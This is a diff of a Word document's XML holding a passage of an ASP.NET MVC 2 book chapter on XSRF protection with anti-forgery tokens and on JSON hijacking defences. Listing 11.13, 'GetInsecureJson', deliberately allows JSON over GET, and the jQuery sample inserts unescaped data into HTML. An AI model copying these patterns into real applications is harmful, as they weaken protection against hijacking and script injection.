+        <w:t>Adding the</w:t>
+      </w:r>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ViewResult</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Save(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>InputModel</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> form)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:t>{</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>return</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> View(form);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:t>}</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="CodeAnnotation"/>
-      </w:pPr>
-      <w:r>
-        <w:t>#1 Protecting against XSRF</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Body1"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Listing 11.11 shows the HTML helper we need in the form.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="CodeListingCaption"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Listing 11.11 </w:t>
-      </w:r>
-      <w:commentRangeStart w:id="15"/>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>Html.AntiForgeryToken</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>)</w:t>
-      </w:r>
-      <w:commentRangeEnd w:id="15"/>
+      <w:commentRangeStart w:id="20"/>
+      <w:commentRangeStart w:id="21"/>
+      <w:r>
+        <w:t>Html.AntiForgeryToken()</w:t>
+      </w:r>
+      <w:commentRangeEnd w:id="20"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CommentReference"/>
@@ -3435,23 +2662,34 @@
           <w:vanish/>
           <w:color w:val="000000"/>
         </w:rPr>
-        <w:commentReference w:id="15"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:t>&lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>form</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> method="post" action="/home/save"&gt;</w:t>
+        <w:commentReference w:id="20"/>
+      </w:r>
+      <w:commentRangeEnd w:id="21"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
+          <w:b w:val="0"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="16"/>
+        </w:rPr>
+        <w:commentReference w:id="21"/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> helper outputs a hidden </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">field </w:t>
+      </w:r>
+      <w:r>
+        <w:t>that allows the server to verify the source of the request.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:t>&lt;form method="post" action="/home/save"&gt;</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">  </w:t>
@@ -3462,20 +2700,7 @@
         <w:pStyle w:val="Code"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">    &lt;%= </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>Html.AntiForgeryToken</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>) %&gt;</w:t>
+        <w:t xml:space="preserve">    &lt;%= Html.AntiForgeryToken() %&gt;</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">          #1</w:t>
@@ -3486,52 +2711,23 @@
         <w:pStyle w:val="Code"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">    &lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>label</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> for="Name"&gt;Name:&lt;/label&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    &lt;%= </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>Html.TextBox</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>"Name") %&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    &lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>button</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> type="submit"&gt;Submit&lt;/button&gt;</w:t>
+        <w:t xml:space="preserve">    &lt;label for="Name"&gt;Name:&lt;/label&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">    &lt;%= Html.TextBox("Name") %&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">    &lt;button type="submit"&gt;Submit&lt;/button&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3547,15 +2743,7 @@
         <w:pStyle w:val="CodeAnnotation"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">#1 </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>This</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> provides a secure token</w:t>
+        <w:t>#1 This provides a secure token</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3623,15 +2811,8 @@
         <w:pStyle w:val="FigureCaption"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Figure 11.8 </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>An</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> exception is thrown if the request is not accompanied by a special token</w:t>
+        <w:lastRenderedPageBreak/>
+        <w:t>Figure 11.8 An exception is thrown if the request is not accompanied by a special token</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3644,14 +2825,12 @@
       <w:r>
         <w:t xml:space="preserve">The appropriate time to incorporate </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CodeinText"/>
         </w:rPr>
         <w:t>ValidateAntiForgeryTokenAttribute</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CodeinText"/>
@@ -3667,15 +2846,7 @@
         <w:pStyle w:val="Body"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">In the next section we'll look at JSON hijacking, another attack that requires developers using ASP.NET MVC 2 </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>take</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> certain precautions.</w:t>
+        <w:t>In the next section we'll look at JSON hijacking, another attack that requires developers using ASP.NET MVC 2 take certain precautions.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3758,37 +2929,19 @@
         <w:pStyle w:val="Body1"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">The solution to this exploit offered by ASP.NET MVC 2 is to only accept requests for JSON data by HTTP POST requests, rather than by </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>GETs</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">.  </w:t>
+        <w:t xml:space="preserve">The solution to this exploit offered by ASP.NET MVC 2 is to only accept requests for JSON data by HTTP POST requests, rather than by GETs.  </w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">This is baked into and enforced by the standard </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CodeinText"/>
         </w:rPr>
         <w:t>JsonResult</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> action result that ships with the framework.  If we were to request data returned by </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>JsonResult</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> with a GET request, we would not receive the JSON data. Listing 11.12 shows how we must issue a POST from JavaScript code requesting JSON data.</w:t>
+      <w:r>
+        <w:t xml:space="preserve"> action result that ships with the framework.  If we were to request data returned by JsonResult with a GET request, we would not receive the JSON data. Listing 11.12 shows how we must issue a POST from JavaScript code requesting JSON data.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3804,52 +2957,16 @@
         <w:pStyle w:val="Code"/>
       </w:pPr>
       <w:r>
-        <w:t>&lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>script</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> type="text/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>javascript</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>"&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>$.</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>postJSON</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> = function(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>url</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>, data, callback) {</w:t>
+        <w:t>&lt;script type="text/javascript"&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+        <w:t>$.postJSON = function(url, data, callback) {</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">               #|1</w:t>
@@ -3864,30 +2981,7 @@
       </w:r>
       <w:r>
         <w:tab/>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>$.post</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>url</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>, data, callback, "</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>json</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>");</w:t>
+        <w:t>$.post(url, data, callback, "json");</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">               #|1</w:t>
@@ -3919,44 +3013,16 @@
       </w:pPr>
       <w:r>
         <w:tab/>
-        <w:t>$(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>function</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>() {</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>$.</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>postJSON</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>('/post/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>getsecurejsonpost</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">', </w:t>
+        <w:t>$(function() {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+        <w:t xml:space="preserve">$.postJSON('/post/getsecurejsonpost', </w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">                     #|2</w:t>
@@ -3971,14 +3037,7 @@
       </w:r>
       <w:r>
         <w:tab/>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>function</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>(data) {</w:t>
+        <w:t>function(data) {</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">                                    </w:t>
@@ -3999,16 +3058,7 @@
       </w:r>
       <w:r>
         <w:tab/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>var</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> options = '';</w:t>
+        <w:t>var options = '';</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">                           </w:t>
@@ -4029,58 +3079,59 @@
       </w:r>
       <w:r>
         <w:tab/>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>for</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>var</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>for (var i = 0; i &lt; data.length; i++) {</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:t>#|2</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t>options += '&lt;option value="' +</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:r>
+        <w:t>#|2</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t xml:space="preserve">data[i].Id + '"&gt;' + data[i].Title + </w:t>
+      </w:r>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>i</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> = 0; </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>i</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> &lt; </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>data.length</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">; </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>i</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>++) {</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
       <w:r>
         <w:t>#|2</w:t>
       </w:r>
@@ -4100,18 +3151,56 @@
       </w:r>
       <w:r>
         <w:tab/>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>options</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> += '&lt;option value="' +</w:t>
+        <w:t>'&lt;/option&gt;';</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">                        </w:t>
+      </w:r>
+      <w:r>
+        <w:t>#|2</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t>}</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">                                         </w:t>
+      </w:r>
+      <w:r>
+        <w:t>#|2</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">  </w:t>
       </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t>$('#securepost').html(options);</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">      </w:t>
+      </w:r>
       <w:r>
         <w:t>#|2</w:t>
       </w:r>
@@ -4120,280 +3209,227 @@
       <w:pPr>
         <w:pStyle w:val="Code"/>
       </w:pPr>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>data</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>[</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>i</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>].Id + '"&gt;' + data[</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>i</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">].Title + </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>#|2</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t>'&lt;/option&gt;';</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">                        </w:t>
-      </w:r>
-      <w:r>
-        <w:t>#|2</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t>});</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+        <w:t>});</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:t>&lt;/script&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve"> &lt;h2&gt;Secure Json (Post)&lt;/h2&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">  &lt;div&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">    &lt;select id="securepost"/&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">            #3</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve"> &lt;/div&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="CodeAnnotation"/>
+      </w:pPr>
+      <w:r>
+        <w:t>#1 A helper function for JSON POST</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="CodeAnnotation"/>
+      </w:pPr>
+      <w:r>
+        <w:t>#2 Our script populates select  options</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="CodeAnnotation"/>
+      </w:pPr>
+      <w:r>
+        <w:t>#3 The target select element</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Body1"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Listing 11.12 uses the jQuery JavaScript library to craft a special POST request for our JSON data </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Bold"/>
+        </w:rPr>
+        <w:t>(1)</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.  When the results are returned</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, the function </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Bold"/>
+        </w:rPr>
+        <w:t>(2)</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> populates the select list with them.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Head3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>11.3.3.2 Override defaults for GET access</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Body"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">The problem with this approach is not necessarily technical - it works and it prevents JSON hijacking.  But it's a workaround that is sometimes </w:t>
+      </w:r>
+      <w:r>
+        <w:t>unnecessary</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> and can interfere with systems developed using the REST architectural style.  In those circumstances we have additional options.  First, we can explicitly enable JSON requests from GETs </w:t>
+      </w:r>
+      <w:r>
+        <w:t>by code shown in listing 11.13.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="CodeListingCaption"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Listing 11.13 Directing JsonResult to accept GETs</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:t>[HttpGet]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:t>public JsonResult GetInsecureJson()</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:t>{</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+        <w:t>object data = GetData();</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+        <w:t>return Json(data, JsonRequestBehavior.AllowGet);</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">      #1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
         <w:t>}</w:t>
       </w:r>
-      <w:r>
-        <w:t xml:space="preserve">                                         </w:t>
-      </w:r>
-      <w:r>
-        <w:t>#|2</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">  </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t>$('#</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>securepost</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>'</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>).html(options);</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">      </w:t>
-      </w:r>
-      <w:r>
-        <w:t>#|2</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t>});</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-        <w:t>});</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:t>&lt;/script&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve"> &lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>h2</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">&gt;Secure </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Json</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> (Post)&lt;/h2&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">  &lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
